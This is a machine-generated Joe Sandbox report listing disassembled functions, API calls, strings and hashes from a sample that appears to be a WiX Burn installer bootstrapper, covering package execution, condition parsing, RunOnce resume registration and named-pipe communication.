Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastRead$CurrentProcess
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
API String ID: 1233551569-452622383
Opcode ID: bd75d0335362dbe1b7ec76015cf3f5468dc966b08025cbbe95fd6fb95ea3ada7
Instruction ID: 3a3a47809d32eec381928857918666ab594fc308b52d2a40b6e3ce1d47b25e27
Opcode Fuzzy Hash: bd75d0335362dbe1b7ec76015cf3f5468dc966b08025cbbe95fd6fb95ea3ada7
Instruction Fuzzy Hash: 8851C736D44326B7DB219BD48C86FAF76A8AB05F60F114176FE10BB280DB709D4096F1

Function 000E27FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON

Download Yara Rule

Strings

RepairArguments, xrefs: 000E287A
DetectCondition, xrefs: 000E2814
Repairable, xrefs: 000E289C
Failed to parse command lines., xrefs: 000E2988
Failed to get @Protocol., xrefs: 000E2974
Failed to get @InstallArguments., xrefs: 000E2847
none, xrefs: 000E2936
netfx4, xrefs: 000E2915
InstallArguments, xrefs: 000E2836
burn, xrefs: 000E28E0
Failed to parse exit codes., xrefs: 000E290C
Failed to get @RepairArguments., xrefs: 000E288B
UninstallArguments, xrefs: 000E2858
Failed to get @DetectCondition., xrefs: 000E2825
Failed to get @UninstallArguments., xrefs: 000E2869
Invalid protocol type: %ls, xrefs: 000E295C
Failed to get @Repairable., xrefs: 000E28B5
Protocol, xrefs: 000E28C3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
API String ID: 760788290-1911311241
Opcode ID: 96116cbf103a44d6a2ed8604c7d4eebbef96dfa811d7d285583224277b97d195
Instruction ID: 1a33c7013feb0d63f0c33e39f8b17761145e0e5105a635daa22b2f506fbfe2f4
Opcode Fuzzy Hash: 96116cbf103a44d6a2ed8604c7d4eebbef96dfa811d7d285583224277b97d195
Instruction Fuzzy Hash: 20411A72E897A3BECB3995658D42FAEB65C5F15B30F200331F924B72C2DBA49D4082D1

Function 000C8F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,560010DB,00000001,?,000C9946,?,00000000,00000000,?,?,000C992E,?,?,00000000,?), ref: 000C8FB2

Strings

Failed to set symbol value., xrefs: 000C9060
Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 000C9242
condition.cpp, xrefs: 000C9084, 000C914E, 000C91CA, 000C922E, 000C936C, 000C93B0, 000C93F4
Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 000C91DE
Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 000C9408
Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 000C93C4
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 000C9098
NOT, xrefs: 000C92DB
-, xrefs: 000C9118
AND, xrefs: 000C92BC
Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 000C9162
Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 000C9380

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: StringType
String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-3594736606
Opcode ID: 4e1aed80f7ab02292ce73af52c5f93c14adb23dc7bc432816ae3523814802295
Instruction ID: c514009a849436d9fdd43106b2e345d41e4308861b80bb27c45c4bd48f23b8a3
Opcode Fuzzy Hash: 4e1aed80f7ab02292ce73af52c5f93c14adb23dc7bc432816ae3523814802295
Instruction Fuzzy Hash: 99F1DF71600215FFDB288F98D88DFAE7BA4FB04700F20854EF9559A685C3F5DA92CB80

Function 000E1BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 000E1CB8
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 000E1CD6

Strings

Failed to parse @Code value: %ls, xrefs: 000E1D91
Failed to get @Type., xrefs: 000E1DB7
error, xrefs: 000E1CC9
Invalid exit code type: %ls, xrefs: 000E1DA7
Failed to allocate memory for exit code structs., xrefs: 000E1C43
forceReboot, xrefs: 000E1D03
success, xrefs: 000E1CA9
Code, xrefs: 000E1D25
Type, xrefs: 000E1C90
exeengine.cpp, xrefs: 000E1C39
Failed to get next node., xrefs: 000E1DBE
Failed to get @Code., xrefs: 000E1D98
Failed to get exit code node count., xrefs: 000E1C03
scheduleReboot, xrefs: 000E1CE5
Failed to select exit code nodes., xrefs: 000E1BDE
ExitCode, xrefs: 000E1BBF

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
API String ID: 2664528157-1714101571
Opcode ID: a727b49bdabd5f371388f88917f2f7effb362d6276c3591a796bc1fa8e6fa6ba
Instruction ID: 08601cf70a2910cf91d94567b255ac8567412d4e052ebe22d607d6cb3d1a4496
Opcode Fuzzy Hash: a727b49bdabd5f371388f88917f2f7effb362d6276c3591a796bc1fa8e6fa6ba
Instruction Fuzzy Hash: 7361D630A0C256BFCB249B96CC41EEEBBA5EF54720F204265F421BB2D1DB719E40CB90

Function 000D6BCA Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 351synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 000CD4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,000D7040,000000B8,00000000,?,00000000,7707B390), ref: 000CD4B7
Part of subcall function 000CD4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 000CD4C6
Part of subcall function 000CD4A8: LeaveCriticalSection.KERNEL32(000000D0,?,000D7040,000000B8,00000000,?,00000000,7707B390), ref: 000CD4DB

CreateThread.KERNEL32(00000000,00000000,000D57BD,?,00000000,00000000), ref: 000D6E34
GetLastError.KERNEL32(?,?,?,?,?,?,?,000C4522,?,0010B500,?,000C4846,?,?), ref: 000D6E43
CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,000C4522,?,0010B500,?,000C4846,?,?), ref: 000D6EA0
ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 000D6F92
CloseHandle.KERNEL32(00000000), ref: 000D6F9B
CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 000D6FB5

Part of subcall function 000EBD05: SetThreadExecutionState.KERNEL32(80000001), ref: 000EBD0A

Strings

Another per-machine setup is already executing., xrefs: 000D6DC8
Failed to register bundle., xrefs: 000D6DEE
UX aborted apply begin., xrefs: 000D6C94
crypt32.dll, xrefs: 000D6ECD, 000D6EE7, 000D6FB4
Failed while caching, aborting execution., xrefs: 000D6E98
Failed to create cache thread., xrefs: 000D6E71
core.cpp, xrefs: 000D6C8A, 000D6E67
Failed to elevate., xrefs: 000D6D94
Engine cannot start apply because it is busy with another action., xrefs: 000D6C28
Failed to set initial apply variables., xrefs: 000D6D02
Failed to cache engine to working directory., xrefs: 000D6D71
Another per-user setup is already executing., xrefs: 000D6CD8

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
API String ID: 2169948125-4292671789
Opcode ID: 89d02a47893ec7f716e4657f89373321d0bbde70ab237c07786e45ee19601d5d
Instruction ID: dd30c24741849a2dbd6d9c85422b767e1538abf3d382a1001522542acd4a62ac
Opcode Fuzzy Hash: 89d02a47893ec7f716e4657f89373321d0bbde70ab237c07786e45ee19601d5d
Instruction Fuzzy Hash: 5AC1BD72900715ABDF219FA4D885BEE37A9AF04704F04417BFD09AE242DB729984CBB5

Function 00108134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00108161
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0010817C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0010821F
CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0010B518,00000000), ref: 0010825E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 001082B1
CompareStringW.KERNEL32(0000007F,00000000,0010B518,000000FF,true,000000FF), ref: 001082CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00108307
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0010844B

Strings

enclosure, xrefs: 00108439
exclusive, xrefs: 001082A3
true, xrefs: 001082C1
version, xrefs: 00108250, 001082F9
type, xrefs: 001081A7
http://appsyndication.org/2006/appsyn, xrefs: 00108154
apuputil.cpp, xrefs: 0010836E
upgrade, xrefs: 00108211
application, xrefs: 0010816E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
API String ID: 1825529933-3037633208
Opcode ID: 38550f05724326e0349e5c218d407538af7efbd6a9ee1683b3f489c0516ccbc8
Instruction ID: 7f9fa4ac4ad68b43c87749deda27d0142fe610ce6493bc85ae6c8802b25e5916
Opcode Fuzzy Hash: 38550f05724326e0349e5c218d407538af7efbd6a9ee1683b3f489c0516ccbc8
Instruction Fuzzy Hash: 57B17C31608606AFDB219F54CC81F9A7BA6BF44730F258658F9E5EB2D1DBB0E851CB10

Function 001077F7 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 206COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00107857
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 0010787C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 0010789C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 001078CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 001078EB
SysFreeString.OLEAUT32(00000000), ref: 00107916
SysFreeString.OLEAUT32(00000000), ref: 0010798D
SysFreeString.OLEAUT32(00000000), ref: 001079D9

Strings

feclient.dll, xrefs: 00107889
length, xrefs: 0010788E
version.dll, xrefs: 001078FA
msasn1.dll, xrefs: 001079C7
comres.dll, xrefs: 001078A6
type, xrefs: 001078DD
msi.dll, xrefs: 00107975
rel, xrefs: 0010784A
title, xrefs: 001078C1
href, xrefs: 0010786E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: String$Compare$Free
String ID: comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
API String ID: 318886736-3944986760
Opcode ID: eccef64d5c840363a2d08807ca37fffacb627834b27350e59950ef8311d4d3f1
Instruction ID: f64083aced7e220b24393a4b40d55b0e8bc574d90a7e32b43220cba8e94662ef
Opcode Fuzzy Hash: eccef64d5c840363a2d08807ca37fffacb627834b27350e59950ef8311d4d3f1
Instruction Fuzzy Hash: 6A616E31D09219BFDF15DB94CC45EAEB7B9AF04320F2142A5F5A1A71E0D7B0AE50DB90

Function 000E9DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,000EBC85,00000001), ref: 000E9E46
GetLastError.KERNEL32(?,000EBC85,00000001), ref: 000E9FB6
GetExitCodeThread.KERNEL32(00000001,00000000,?,000EBC85,00000001), ref: 000E9FF6
GetLastError.KERNEL32(?,000EBC85,00000001), ref: 000EA000

Strings

Failed to get cache thread exit code., xrefs: 000EA031
Failed to execute compatible package action., xrefs: 000E9F73
Failed to execute dependency action., xrefs: 000E9F36
Failed to execute MSP package., xrefs: 000E9ECB
Failed to load compatible package on per-machine package., xrefs: 000E9F5C
Failed to execute MSU package., xrefs: 000E9EFB
Invalid execute action., xrefs: 000EA056
Failed to execute package provider registration action., xrefs: 000E9F17
Failed to execute MSI package., xrefs: 000E9EA6
Cache thread exited unexpectedly., xrefs: 000EA047
Failed to execute EXE package., xrefs: 000E9E7D
Failed to wait for cache check-point., xrefs: 000E9FE7
apply.cpp, xrefs: 000E9FDD, 000EA027

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: 9f0073f9b80d67dd1e0040829adffa3fb01560a7c8e48225b41b6b2ba27511ae
Instruction ID: 8c168ae72ab12e9fd92a77588afc628f11356ff854b44778cfacd3b4de2d69dd
Opcode Fuzzy Hash: 9f0073f9b80d67dd1e0040829adffa3fb01560a7c8e48225b41b6b2ba27511ae
Instruction Fuzzy Hash: 01717E71E012A9EFDB24CFA5C941EBE7BB8EB49B10F114169F904F7240D371AE419BA1

Function 000CF210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00103AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00103B3E

RegCloseKey.ADVAPI32(00000000,?,00110D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 000CF440

Part of subcall function 001014A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,000CF28D,00110D10,Resume,00000005,?,00000000,00000000,00000000), ref: 001014BB

Strings

Failed to write resume command line value., xrefs: 000CF35D
BundleResumeCommandLine, xrefs: 000CF348, 000CF3DB
Failed to format resume command line for RunOnce., xrefs: 000CF2F9
burn.runonce, xrefs: 000CF2DA
Failed to create run key., xrefs: 000CF31D
Failed to write Installed value., xrefs: 000CF2B6
Failed to write run key value., xrefs: 000CF33B
Failed to delete run key value., xrefs: 000CF3CE
Installed, xrefs: 000CF2A5
"%ls" /%ls, xrefs: 000CF2E5
Resume, xrefs: 000CF282
registration.cpp, xrefs: 000CF3C4, 000CF412
Failed to write Resume value., xrefs: 000CF293
Failed to delete resume command line value., xrefs: 000CF41C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseValueVersion
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
API String ID: 2348918689-2631711097
Opcode ID: 25cb29466fe489bcf1cd3e56e7873139a67fa1811b9556ba20796e5ff8a4cc58
Instruction ID: c0c7aecdba326a591d184c7662ad148ae726ee69ac040b1b1fdf6d13ee0acee5
Opcode Fuzzy Hash: 25cb29466fe489bcf1cd3e56e7873139a67fa1811b9556ba20796e5ff8a4cc58
Instruction Fuzzy Hash: 9A51C332D40267FBCF299BA08C46FFFB6A6AB04710F15413DF900B6191D7B59A9097D2

Function 000ECC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(774C8FB0,00000002,00000000), ref: 000ECC9D

Part of subcall function 000D4D8D: UuidCreate.RPCRT4(?), ref: 000D4DC0

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,000E2401,?,?,00000000,?,?,?), ref: 000ECD7B
GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 000ECD85
GetProcessId.KERNEL32(000E2401,?,?,00000000,?,?,?,?), ref: 000ECDBD

Part of subcall function 000D54DC: lstrlenW.KERNEL32(?,?,00000000,?,0010B500,?,00000000,?,000C452F,?,0010B500), ref: 000D54FD
Part of subcall function 000D54DC: GetCurrentProcessId.KERNEL32(?,000C452F,?,0010B500), ref: 000D5508
Part of subcall function 000D54DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,000C452F,?,0010B500), ref: 000D553F
Part of subcall function 000D54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,000C452F,?,0010B500), ref: 000D5554
Part of subcall function 000D54DC: GetLastError.KERNEL32(?,000C452F,?,0010B500), ref: 000D555E
Part of subcall function 000D54DC: Sleep.KERNEL32(00000064,?,000C452F,?,0010B500), ref: 000D5593
Part of subcall function 000D54DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,000C452F,?,0010B500), ref: 000D55B6
Part of subcall function 000D54DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,000C452F,?,0010B500), ref: 000D55D1
Part of subcall function 000D54DC: WriteFile.KERNEL32(?,000C452F,0010B500,00000000,00000000,?,000C452F,?,0010B500), ref: 000D55EC
Part of subcall function 000D54DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,000C452F,?,0010B500), ref: 000D5607

Part of subcall function 00100A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,000C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00100A38
Part of subcall function 00100A28: GetLastError.KERNEL32(?,?,000C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00100A46

CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,000ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 000ECE41
CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,000ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 000ECE50
CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,000ECBEF,?,?,?,?,?,00000000,?,?,?), ref: 000ECE67

Strings

Failed to create embedded pipe name and client token., xrefs: 000ECD00
embedded.cpp, xrefs: 000ECDA6
Failed to process messages from embedded message., xrefs: 000ECE04
burn.embedded, xrefs: 000ECD38
%ls -%ls %ls %ls %u, xrefs: 000ECD40
Failed to allocate embedded command., xrefs: 000ECD54
Failed to wait for embedded process to connect to pipe., xrefs: 000ECDDF
Failed to create embedded pipe., xrefs: 000ECD27
Failed to wait for embedded executable: %ls, xrefs: 000ECE24
Failed to create embedded process at path: %ls, xrefs: 000ECDB3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
API String ID: 875070380-3803182736
Opcode ID: 8645049769b6876ddd4a0c1e8768b0e85e19e11da21384f4dfb828da2a9226e9
Instruction ID: 595c642d1997645550376c9c92bebd8c7da8591e59ca1dc755f6076f9511abd6
Opcode Fuzzy Hash: 8645049769b6876ddd4a0c1e8768b0e85e19e11da21384f4dfb828da2a9226e9
Instruction Fuzzy Hash: 93517072D4026DBFDF129B94DC46FDEBBB9AF08710F110122FA00B6291D7729A518BD0

Function 00107F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,00108468,00000001,?), ref: 00107F9E
CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00108468,00000001,?), ref: 00107FB9
CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00108468,00000001,?), ref: 00107FD4
CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00108468,00000001,?), ref: 00108040
CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00108468,00000001,?), ref: 00108064
CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00108468,00000001,?), ref: 00108088
CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00108468,00000001,?), ref: 001080A8
lstrlenW.KERNEL32(006C0064,?,00108468,00000001,?), ref: 001080C3

Strings

md5, xrefs: 0010805B
name, xrefs: 00107FCB
msi.dll, xrefs: 00107F98
sha256, xrefs: 0010809F
http://appsyndication.org/2006/appsyn, xrefs: 00107F91
apuputil.cpp, xrefs: 001080DB
digest, xrefs: 00107FB0
sha1, xrefs: 0010807F
algorithm, xrefs: 00108037

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
API String ID: 1657112622-2492263259
Opcode ID: 69069664afc1112385ce0c0863c48301bbbfd88d4b1ce05b5b76ab1b02ab617f
Instruction ID: 22f79cf810fbf14cd4cc63f1a0e3e79ec7fa26506b52f8b15617b5a2351d0842
Opcode Fuzzy Hash: 69069664afc1112385ce0c0863c48301bbbfd88d4b1ce05b5b76ab1b02ab617f
